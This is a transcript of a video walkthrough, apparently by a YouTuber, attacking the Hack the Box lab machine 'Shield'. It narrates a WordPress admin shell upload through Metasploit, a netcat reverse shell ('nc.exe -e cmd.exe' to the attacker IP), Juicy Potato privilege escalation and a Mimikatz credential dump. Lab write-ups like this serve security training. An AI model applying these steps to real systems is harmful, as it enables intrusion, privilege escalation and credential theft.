Hey, this is Kendrick, and so today we're going to be walking through attacking Hack the Box Starting Point Shield. So we're going to go ahead and jump into this tutorial. The first thing is we're always going to do reconnaissance. And by the way, that's where the box is located. You all know this. So we're going to do an Nmap scan first. So Nmap -A, which is like full attack mode, very noisy, gives you a lot of information. And then it's going to be, make sure you use a -P- at the end, okay? Go ahead and press enter there. All right, and is that running? Okay, I did not have to elevate my privileges, just making sure. So let's read through the guide. From the Nmap output, we find the ISS MySQL. So IIS is a web server. MySQL is a database. I run it on the default ports. IIS, Internet Information Services, is a web server created by Microsoft. All right, and so we should see that in just a second as it's running. In addition to that, we're going to go look. And so our next step is to go ahead and navigate to that. So while this is running in the browser, we can go ahead and open up a new tab. I got a lot of this stuff open already. So let's use this. So 10.10.10.29 is our address. So, and you see this opens up. So I've seen this for years. This is like a big clue that, hey, there's something out there, default, you can probably attack it. Not the best thing to have out there. So anyway, with that being said, so now we know it's there, so we navigate to it. Let's look at our Nmap scan, which should have not finished at this point. So let's go ahead and move on. So we see the default IIS web server. So what it wants us to do is to do this go buster command, okay? So I'm going to copy this so you can do the same, Control-Shift-V. Now, here's the thing right here. This is different. If you're on the Kali Linux box like me, you'll notice that this is not in the same directory. These two directories are reversed. Wordlist and dirb are reversed. So user shared dirb wordlist common.txt. So for you, if you type that command and it didn't work, that's why. I've already got it copied out, so you can go ahead, you can mimic my command. I'll leave it on the screen for just a second. So let's go ahead and do a new tab, Control-Shift-V. There's my command. Make sure you take note, pause the video, look through it if you want to. All right, and let's run it, see if we need elevated privileges. But what it does is this program does directory enumeration. Okay, so scan reveals the folder name WordPress. And so that's what we're looking for, is what is it going to find? What can we attack? So we'll let that run for just a second. Let's look at our Nmap scan. All right, and so to go back and look at this, so when we did the Nmap scan, what they're showing here is port 80 TCP open IIS. So let's look at our scan right there, port 80 TCP, I'm sorry, HTTP, not TCP, Microsoft IIS 1.0.10. Okay, so we're matching. Also, port 3306 is open, MySQL. All right, so we'll go back to this command. All right, that's run. And so GoBuster, it says, can scan for any subdirectory of files that are hosted on the server. And we see a WordPress directory, and that's what it shows here, status 301, okay? All right, the scan reveals a folder named WordPress. Let's navigate to that folder so we can go back to our little default IIS web server. You can put a / and just WordPress. And no backslash, you can do it just like they did. All right, and it brings up this page. Okay, I'll close the one. You see, I've done this before. I always walk through these tutorials first at this point. So we see a folder. So now we need to get a foothold. So WordPress is a content management system, or CMS, that can be used to quickly create websites and blogs. Since we have already acquired the password, which is PAT, and this is once again, each of these exercises build on previous ones. So if you don't have this information, you're going out of order. I strongly recommend that you go back a couple of videos and look at mine and look at the guys and walk through this. Log into Hack the Box and walk through these sequentially. We can try to log into the WordPress site. We navigate to the login page. I think I've already, yep, I copied that. So just to make it easier, I copied these things out just to make sure, because sometimes there are some syntax errors. So I'm going to go ahead and open up a new tab. And I may consolidate these. Control-Shift-V to paste. I actually tried to type there, so let me clean this up. Okay, and okay, that is not what I was trying to do. So close that, and we can just overwrite this. We can just, basically, we're gonna put WordPress, and then the next step is WP login. Let's type it out. .php, real simple. I'm overcomplicating this. Okay, so now we're at the login page. Once again, we got credentials before. just something so you know, WordPress, the default password. Woo! Sorry, the default username for most WordPress sites, most people don't change it. It's going to be admin, not administrator, admin. Okay, they may change it, but I'm just telling you so you know. And so this password, we can try to log in the site once again, which we acquired from previous exercises. Okay, make sure I didn't miss nothing in here. Okay, let's go ahead and paste that, and we'll see if we can log in. Lo and behold, it works. Okay, so we navigate to this and we try to guess the username. Some common usernames are admin or administrator. The combination of admin and password is successful and we gain administrator access to the site. Okay, so we're in. The administrator access can be leveraged through the MSF module. This is what's called Metasploit. You've heard it. So now we're going to go into doing some Metasploit. All right, a lot of people get really excited, and I'll be honest, when I first got into this stuff, I was very excited about Metasploit. I thought it was like this is super amazing, like unbelievable, like, you know, godlike tool. But it is a good tool, but it doesn't necessarily show hacking maturity. Okay, so because it is so simple, it makes hacking accessible for everybody. So you're going to type MSF console, press enter, give it a second. This is going to launch Metasploit. Now I'm going to explain each of these elements here, because you're going to say this exploit command. What you're essentially doing is you're going to be attacking and you're telling Metasploit what to use, where you're going, where you're coming from, all these things. So there's some steps that are left out and I'm going to fill in the gaps for you. Okay. Hey, cool new picture. I love it, man. The text art they do is absolutely phenomenal, or that they upload with their program. So now that we're in, we're going to tell it to use exploit, exploit, Unix, web app, WP admin. Gotta get I'm tripping. Shell upload. Check your syntax. If you get it right, it will. So no payload configure. All right, so anytime it puts it in a red like that, that's good. Why are we using this exploit? That's because they've helped us out and previously determined the exploit that we're going to use based on the information we got. That is WordPress, the directory, and all that stuff. Okay. So now we want to set the password, and I'm going to speed this up a little bit by copying this, and I'm going to Control-Shift-V, set password equals that. I'm going to set username. I can type that out. Set username, all caps, admin, all lowercase. Set target URI, or basically the target location URL, / WordPress. You got to get these right, or you're going to have problems. You're going to set our host, which is for remote hosts, who you're attacking, basically. 10.10.10.29. And then you're not going to run this yet, because you want to find out what your IP address is. I've already done it, so I already got a window open. Go to open up a blank window, type ifconfig tunl0, find out what your IP address is. We found in the exercise that you have to set your local host address too for this to work properly. That's not in the exercise, unfortunately. Okay, so going back to our window, we're gonna do one more command: set lhost. And let me double check my syntax, make sure. Actually, let me show you something right quick. Do show options. There you go. That's how you can see what all you can plug into it. So we've set all the other stuff. So we want to set lhost, and see right now lhost is 10.0.2.15. That's not going to work. So we're going to do set lhost 10.10. What did I just look at? 16.22. All right. And it doesn't like that. So I think it needs to be all lowercase. There you go. Show options again. And now, okay, so now that's all set. We're good to go. So now we're going to go ahead and run the command. If everything is correct, you're going to see what's going to happen. All right, keep watching. And we get what's called interpreter. this is what we want, Meterpreter. Okay, very important. Meterpreter is like the next step in your attack. So I can't do a clear screen command because I want to get all this crap on my screen, but that's okay. So now that we got the Meterpreter interface, let's see, previous, this is where, oh gosh, I got in this mode. Sorry, hold on one second. I got in this whole mode where it's like, it got to like page through everything. I don't know. I hate this. You know, I'm just gonna open the guide again because it's just not worth it. It's not worth taking the time to figure out what that mode. I like to be able to just scroll down while I'm doing these exercises, and it's better for everybody who's watching if I can just kind of scroll from page to page. Sorry about that. All right, so we're here where we got Metasploit installed. And so now it wants us to do a netcat command. All right, or netcat LC. Okay, so what it's telling us is we're setting the LCD, which is a local something directory, local change directory. Okay, so now we need to do that. We're connected. Now we need to set the local change directory. Let me check the video time, see where we're at. We're at 11 minutes. Okay, not too bad on this video. I try to keep these below 30 minutes, so please bear with me. So LCD, local change directory / home. And you got to put, it's got to be what's on your machine. Okay, so home Kali downloads. That's for your machine. So don't type what they type. / home Kali downloads, or wherever your home directory is on your server. All right, that's the local change directory. So, and it's which we use to navigate to local folder where netcat is located. So netcat is not located in this directory. Okay, we can copy netcat to this directory. And so on your Kali VM, I'm going to type my command. Okay, I'm going to put it here. Take time, pause the video. Control-Shift-V. I know it's at the bottom of the screen there. So user, listen carefully. I did a copy space / USR user / share / Windows -resources / binaries / netcat.exe to home Kali. I'm putting downloads netcat.exe. Okay, so I'm copying that from where it is. I'm telling you where it's located on your Kali VM. So you got to do this first before you can run that command. All right, so it failed. Let's see, sudo. Let's see if I can sudo copy. Can't. Okay, so home Kali downloads nc.exe. All right, let me try. I'm going to copy it just to, I'm going to drop downloads and see if I can copy it there. Got to get rid of the sudo. Okay, all right, so look, okay, I can't do this inside. Let me go to a new window. I think the issue is I'm trying to do this inside Metasploit. So now I'm going to run this command, Control-Shift-V, send command, copy that, and I'm still going to change the downloads. And then watch, it's not going to work. Oh, it did work fine. Okay, let's see if we got it. Yeah, so you just do that outside of Metasploit. There's nc.exe right there. Okay, so we got that. Now we can go back to this window. Now we got it copied. So now we're back on track and we can run this script. Okay, so it wants us to type cd and go to this folder, and then we're going to upload netcat.exe from the local change directory, which is the downloads folder. So we're doing, this is actually happening on the server. What's in Meterpreter right now is happening on the target Windows servers that we're attacking. So cd // you don't have to put this in caps, by the way, on the Windows commands. INET inetpub www.root. If you don't know about Windows Server, inetpub is where the www and the FTP files, like these directories where you upload and download things to the websites, are located on Windows IIS server. So if you had an experience with Windows servers in the past, you're familiar with that. Okay, WordPress / wp-content, which is a folder just about in every WordPress site setup, and then uploads. Okay, So that did not work. Okay, so I'm gonna try. Let's look at my command again. CD. See, okay, I'm sorry. I'm having a fight between Windows and Linux in my brain. Okay, CD /. Make sure you use /. Okay, I'm tripping, man. I'm tripping. Okay, so there's the directory, and now we're gonna upload netcat.exe. Okay, let's see if that was correct. -1, 56 bytes. I don't know if that worked. Let me do a directory because we're looking at the Windows server. All right, so I see nc.exe is there. Okay, so that's good. We can proceed. We then navigate to a writable directory on the server, which is uploads. And I think we're already there, okay? Which is c:inet pub www up that upload netcat, and let's start netcat. So this command we need to run in a separate DOS window. It doesn't really specify a lot of this. So let's clear, and we're going to nc-lvp and 1, 2, 3, 4. We're going to press enter. So we got a listener. Now we're going to go back to the previous window, and we're going to do this on the server. We're going to tell the server to holler at us. Okay, so we're going to say execute -f nc.exe -a quote, and I might have to, let's see if I copy this out. Okay, I guess this worked by default. Okay, so -e cmd.exe, so 10.10.14.2 1 2 3 4 space 1 2 3 4. Let's try that, see if that works. All right, it created a process. Question is to get a netcat shell. I did not see. I saw the process was created. It did not hit my netcat listener, and that should have. So let's take this again. I'm going to copy it just in case. Oh, double check my syntax. Execute -f nc.exe -a. Let me do a directory command. Make sure I'm in the right one. Yes, I am. So -a open e command.exe. See, I made a mistake. 10.10. You need to put your server IP address here. Okay. See that's where, once again, just I knew something was wrong. So 10.10.16.22 is my address. You put your address. So modify this as 10.10.16.22 and run this. Okay. And there it is. Okay, so you see this has changed now. And I actually have a C code. I'm actually on the server. I'm connected to the server. Okay. All right. So running the sysinfo command on Meterpreter session, we notice that this is a Windows 2016 OS, which is vulnerable to Rotten Potato. So Meterpreter is right here. And we're going to do sysinfo, sysinfo. Press enter. And there it is. It's Windows NT 10.0 build, which is Windows Server 2016. That all complies. So now we're getting to this other part. So we know this is Windows 2016 server, which is vulnerable to Rotten Potato exploit. Go ahead and click on this. It'll open up this page here, okay? And so I went ahead, I'm going to see, where did I get this from? I've got a link that I may just type here because I've got Rotten Potato, but I think we ended up running into some issues here. Okay, Rotten Potato. See, it's telling us all this stuff. Guess what I got? I've got a link here. I'm going to copy this link for you, okay? Wait, hold on. No, stop for a second. It's just telling you it's vulnerable. That's just information. Okay, sorry about that. It's just telling you that it's vulnerable to that. Don't go there. Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to system highest privileges by leveraging bits and what is this? SE assigned primary token or SE impersonate privilege in a man-in-the-middle attack. We can exploit this by uploading Juicy Potato. This is the one we're going to actually use. GitHub, you see that? You can click on it and go to that to go to Juicy Potato. it takes us to this GitHub site. There's a trick, okay? So I'm gonna close this and duplicate this. This is another one that messes you up, and you need to know this, okay? Me and big shout out. Make sure I take the time to give a shout out to my buddy who helped me out when I was doing these hacks. His name is on Discord is Green Goblin 911. He came into the stream on Twitch. Green Goblin, thank you again, because we worked through this exercise the first time together, and he helped so that you don't have to worry about this. So I'm going to close this. Now watch. I'm going to click on this. We looked all over this GitHub. Did not find it at all. So what we ended up finding out is you have to take off, and he found this, by the way. So shout out to him, because he's the reason why we're able to do this, okay? So I'm going to refresh this for a second. Juicy Potato, and then you have to put / releases. When you do that, there's the juicypotato.exe file that we were looking for. I have no idea how he found it, but he did. He saved us a lot of trouble. So what we need to do is we need to download this to our downloads folder. Remember, our local change directory is the downloads folder. So we need to save this. And by default, everything saves to the download folder anyway. Okay, so we're in good shape there. You can always click on your Windows folder, your Linux browser up here, open folder, and just go to the downloads folder and just double check to make sure it's there. So Juicy, you see I've got it there several times. I went ahead and download it again because I want to make sure everything works the way we were doing it in the exercise, as you're doing it too. So I'm going to delete that duplicate. We don't need that, but there's my Juicy Potato that we're going to execute. And so now we're going to go back to our Windows shell or Meterpreter shell, okay? And we're going to do the next step, which is we're in the downloads folder. So it wants us to make sure LCD, the local change directory, is user home download. Once again, told you it's your LCD is /home. If you're doing this on Kali Linux with me, Kali downloads. Enter. Okay. And now you're going to type upload juicy potato.exe. Give that just a second to do its happy joy thing. And then once we upload it, we're going to rename it to something else. Okay. So I've gone through this exercise. I'm looking, it looks like the service been reset. So what I had on there before wasn't there. Error running the command upload, timeout, operation timed out. I'm just going to run. So here, what this tells me, we've lost our Meterpreter session. This happens. It does happen. No worries. Okay. Control C. We're going to just type run again. Oh, and I can't do this in Meterpreter. I actually got to go out again. So let's see if we do quit. Okay, so you want to get back to the screen where you see the exploit, and then you're going to run the exploit again. This is going to reconnect this, okay? This is all part of it. I'm glad it's doing this because this is normal, okay? A lot of times you're going to lose the session. You're going to need to remember the steps to reestablish it. Okay, so now that we've done that, we're back in Meterpreter. Now I'm going to try to upload Juicy. And guess what? It's working the way it's supposed to. So upload it. I don't know why this -1 like that, but it worked. Okay, and then I'll type directory. But guess what? We moved to a different directory again. So that's the problem. So I'm going to go ahead. I'm going to copy this because this is a quick and dirty way to get back to it. And I'm just going to type CD, Control-Shift-V, type DRR. All right, so it does not want to let me do it that way. So I can do CD / directory, okay, or PWD for print working directory, okay. So plug in CD ... to go back one, PWD, and then I can type CD uploads, PWD, print working directory, okay, directory, and we're back. So I see my shell. Do I see my rotten potato? No, I don't. Okay, so I see my netcat is there. I'm good there. I need to upload my rotten potato. So let's go ahead and do upload again. And okay, upload juicy potato. Sorry, we're not doing rotten. We're doing juicy potato. All right, and just looking at this, I'm going to type directory again. All right, and so right there, it's not there. Now Juicy Potato is there. We're good to go. So now we're gonna move Juicy Potato to js.exe. Okay, so we're gonna do an mv Juicy Potato to js.exe. Type directory again. Juicy Potato is gone. js.exe is now there. Successful. So now that we have that, we can create a batch file that will execute by exploiting and running the system shell. Let's add the following contents to the shell.bat. This command is broken. It is not formatted correct. The command is correct, but because it's in a PDF document, the command is broken. It does not work. Go to Mousepad, right there. Open up Mousepad. Go ahead, we'll make this full screen. Paste that command. See, it's 2 line. It should be 1 line. So backspace, put a space right there after the E. There is a properly formatted command. Go back. And this echo start command is going to create this batch file called shell.bat. I've already got it created. So let's delete mine. Directory again, shell.bat is gone. Okay. So now we're going to make sure the command works. Control-Shift-V. I deleted it because I'd already done this exercise, so don't you do that. You don't have to worry about that. So we're gonna run this command, echo start. Oh, what is going on here? Let's see. Okay, all right. We should not run this. This is where it gets confusing. We got to change windows. Remember, we just got this nice connection right here. We run this over here. Control-Shift-V, not in the interpreter. Okay, if it doesn't have the MSF in front of it or interpreter. They show MSF, ours shows Meterpreter. You go to this window that we use when we connected using the Netcat listener and run it there. Okay, we did that command. Echo starts. Now we should have a shell.bat. Easily do a directory. Do we have a shell.bat? We have a shell.bat again. There it is. All right, so we look in good shape. Now it wants us to go and let's start another Netcat listener. So a new tab. Let me check the time. 27 minutes. Okay, we're getting to the end. Okay, the end is near. So we're going to do it netcat minus LVP 1111. So we started a new listener on 111. So now we can execute the netcat shell using the following command. All right, here's the command. We're going to run this, Control-C. Going to go back to the previous tab, right? That's where we did the command. And remember, there's no MSF in front of us, so there's no interpreter. So Control-Shift-V to paste it here. Looks like that's running. All right. Okay, so we did the command. Did that say? Yeah, everything matched. All right. So if this is correct, I'm going to do something. I'm going to see what my permissions are, which is I'm going to do who am I? And it shows I am IS app pool WordPress. Okay, so now it tells us the root flag is located at SQL Administrator Desktop. I'm going to be honest with you. I don't think we can get there yet. Let's double check. CD user. Because see, the thing is, I don't think we elevated our privileges enough. Looking at this, oh, wrong window. See, all right, we had a mistake. I goofed again. Sorry again. Guess what I didn't do? I did not change that command. I told you the correct command, but the thing is, I didn't execute. So remember, we got this new netcat listener right here. We got to run this JS command. All right, but I didn't get a callback. I didn't get a hit. So let's see, what did I do wrong? Oh, you know what? When I made my shell.bat, look at this. I messed up right there. Okay, so let's quickly fix what I messed up with that shell.bat file. So I'm going to go back to this window, directory. All right, I'm going to delete shell.bat. Directory again, make sure it's gone. All right, let's go back to Mousepad where we created it. Remember my IP address, 10.10.16.22. You need to know what yours is, okay? There's my listener. I'm going to go back here. I can't clear this. I don't know if this will work. But I'm going to go to Mousepad. Look at there, 10.10.16.22. So sorry if I led you wrong. But like I say, mistakes are part of this. So 10.10.16.22 shell.bat. I'm going to copy that. I'm going to double check myself just one more time. 10.10.16.22. Don't want to mess this up. Go back to this screen where I'm there, and let's run the Control-Shift-V. Create a shell.bat directory. Shell.bat command is there again. Should be in this time with the correct address. Now we're going to run this js.exe command. Okay, again. Once again, Control-C, Control-Shift-V, press enter. That's going to execute. All right, it finished. Boom. Now look at that. We got that. That's all we had at first. Now we got this shell. If I type who am I, we are anti-authority system. We're running this with system privileges, which means that we are now able to get to the administrator folder. So we want to get the flag, but remember, post exploitation, we want to own the box. Okay. All right. And so here, if you just want the flag, this is how you get it. So at this point, directory, don't do that. It's a waste of time. So CD, we don't want to do that. So CD /users dir, see what kind of user we got. Okay, there's administrator. You can do basic CD admin like Ash. This is Windows. Now you're typing your own Linux connected to a Windows box as if you're on the Windows box. So you can do the shortcuts. Directory right there. And I'm going to CD DSK asterisk. I'm going to type it all out. Directory. Root.txt to look at the flag. You're going to do a type root.txt. And then you can take your flag, copy your flag, Control-C, Control-Shift-C. I just literally dropped out of my interpreter prompt because I was a dummy. I did a Control-C. Don't do that. I can get back in though. So I just have to run a command, but Control-C knocked me out. I'm going to go back in just a second because for those of you that want to know how to finish, like to go all the way, you want to maintain persistence on the box as a hacker. You don't want to just get on the box. You want to actually get the box, and then you want to be able to establish persistence, stay connected to it. So if you go to Shield and you click on the icon right there for Shield, click Submit Flag. Through there, page difficulty, I'll say this is a 5 for a lot of, and then I've already owned the box, so I can't do it. So you're finished there. But for those of you that want to know the rest of it, you want to like finish the exercise and not just get the flag, but understand how to fully own this box, we're going to do the next step. So hang on. Here's the final step. Last page. Okay. So we want to do mimikatz.exe. Guess what? It's not so straightforward. It just tells you to do an upload of Mimikatz. It doesn't tell you where to get Mimikatz from, but Mimikatz is already installed on your Linux box. Okay. And so where is it? Where is it? Start root. There you go. Okay, so I didn't even make it easier for me. So let's do this. I'm gonna tell you, I am not the best Linux searcher. Okay, so we want to do this first. This was our port that was listening on, I think 111. Yeah, I'm gonna set this back up. The netcat command. Let's set that listener up. In fact, let's clear this junk. Let's set the netcat listener up again right there. Let's go back to this window. Do our last command, which is the JavaScript command. They're going to execute that bash file again. Right there. Control-Shift-V, the JS command, and go back here. There we go. Okay, we're back on the box. Who am I? I'm back. I'm system again. So don't make the mistake that I did. We've got the root flag. This one does not have a user flag, but it wants us to go to upload mimikatz.exe. So let's just look. If you just go by the guide, back to our interpreter prompt, okay, type directory, make sure I can still see files. Still there. I'm going to say upload Mimikatz. But how do I upload Mimikatz when I don't even... Mimikatz is not in this folder. Remember, this is our local directory. This is our remote directory. Let me go to a local window. Okay, let's just open a new tab. Okay. And I'm going to go to CD downloads directory. By default, Mimikatz is not going to be in directory. If it's in mine, it's because I've done this already. So I'm going to delete Mimikatz. So remove, sorry, Mimikatz.exe. ls. Okay, all right, cool. So that is gone. Somebody just subscribed on Twitch. That's funny. So with that being the case, I removed it. Where do I find it? I'm going to show you my command. I'm going to do a sudo find pipe grep mimika. Well, actually, you want to do this root. So I'm going to change cd back / go to root. Go do ls, and then I'm going to do a find. I'm going to do a very expensive search pipe grep sudo in front of that, and then mimikatz.exe Kali for the password. And once again, you can wait a few more minutes. If you made it this far, you might as well wait and go ahead and finish the complete exploitation of the server. All right, and so there it shows us in user. Oh, I actually had this documented already. I'm so dumb. User share. Nope, I did document that. Okay, good to know. So users share Windows resources, Mimikatz. You got a Windows 32 for a 32-bit version and 64. This server is most likely going to be a 64-bit. I'm going to do a Control-Shift-C to copy that, put that in my text document so I can reference that. In your case, you want to put that in Mousepad, okay? Here, you want to be keeping your commands right here. So there's mimikatz.exe. That's where we're going to copy it. And so the next command is we want to copy that to a directory where we can use it, okay? So I'm going to change to cd home Kali downloads, and then I'm going to do a copy command cp, and actually I'm going to do sudo because I'm copying out of a protected directory. So sudo to elevate my permissions to root, Control-Shift-V, mimic. So basically that's the file to the Mimikatz, and then what I want to name it in the target where I'm copying it to, which is Mimikatz mimikatz.exe mimikatz. Okay. Uh-oh, I got a problem. User share. So sudo. Okay, that's wrong. Sudo cp for copy. Okay, how about that? That works. Okay, if I do a ls right now, Mimikatz should be back in our directory right there, which is our lcd. So now we can go back into Meterpreter. Once again, you got to keep these tabs open. This is hacking life. All right, there's our Meterpreter again. And so we're going to upload Mimikatz.exe. And remember, it's not up here already. All right, let's type directory. Uh-oh. So I lost connection again. Just got to type run. No problem there. And by the way, I think this is okay. So it looks like no. Uh-oh. Wait, hold on. Uh-oh. So we're having trouble. Somebody might have reset the server. This is all part of it. Just run it again. Oh my gosh. This happens more times than you like to believe. So wait. Let's double check here. I think the main thing is to see if I actually still got a connection. Let's do directory here. I do. And guess what? Oh, even though my Meterpreter shell died, I did get Mimikatz up on the server. Whew. Okay, so I don't have to worry about that. That error won't cost me too much. So now what it wants us to do is execute Mimikatz, use the ccurl US, what is it? I don't know what that securl lsa US command to extract login passwords. So let's go ahead and do this on the box. So /. By the way, even though we're on the Windows box and type a Windows command, when you want to type an exe or execute an exe file, you have to put the period in front of it. I don't know if I have to do the period /. Okay, that might not work. I'm going to try it. Okay, we ran that command, see, not recognized. So for me, what worked is .mimi. Just use the period. Okay, not recognized. Okay, let's look at this again. So let's try again. // mimikatz.exe. So it's not okay. Let's just run it. Okay, so you didn't have to put any of that in front. See, that's what I'm saying. So you run Mimikatz, nothing happened with all the dot and slash. So don't put the dot or slash in it because mine didn't want that. And then let's type SEKURLSA : log on passwords. Press enter. All right, what do we get? So no, that did not work. So let's do this again. SEKURLSA : LOGONASSWORDS. Okay, so I'm gonna tell you why this is not working. I'm in the wrong window. Who am I? I'm in the, let's exit Mimikatz. Don't make this mistake. I'm in the wrong window. Remember I used this other one to elevate my privileges? Right here. Who am I? This is the one that's running that system. This is where I need to run a command, okay? So to save time, I'm gonna go to this other window, Control-Shift-C to copy my path, so I don't have to type it again. CD, nope, wrong window. Right here, CD, Control-Shift-V. See if I can do it. Now, directory. Now we're, okay, so now I'm in the right one. And we're gonna type Mimikatz. Okay, did that like it? Okay, now since I'm at system level, I think I gotta type the dot slash. Let's try that. There it is. Okay, so that's why it didn't work. So now I'm in elevated privileges, the administrator on the box or system on the box. I can type that. And then I want to do SEKURLSA : LOGONPASSWORDS. All right, it typed all this. And what it wants you to notice that we're looking for the password for domain user Sandra. Okay, domain user Sandra. If we scroll through here, you're gonna see username. Be looking for username. Believe it or not, I actually did this on my own. It's pretty crazy that I actually came to this conclusion. So I guess I am learning from doing all these exercises. So there's Shield. Keep going till we see Sandra. Okay, because Sandra is our friend. No. Nope. Keep going. Oh, I saw it. There it is. Username Sandra. Right there. There's Sandra. There's the password. 1234. I'm gonna go ahead and we'll just copy this out. We got information about Sandra. Control-Shift-C. Go ahead and go over to my document here. Paste this. And with that, we have 100%ed this box. Hope this video was helpful. Sorry for being a little bit long this time, but hey, you know, I'm including a little bit of steps and problems that I have because these problems you're going to encounter and you need to know how to solve them. So don't forget to drop a like on this video if it was helpful. And don't forget to subscribe to my channel. I will be back with the next box, the final box in the Hack the Box Starting Point series, the free box. And then you start getting to the paid ones. And I'm going to go ahead and pay it. I'm going to pay and join Hack the Box. And we'll start doing those boxes for you too. Thanks for watching.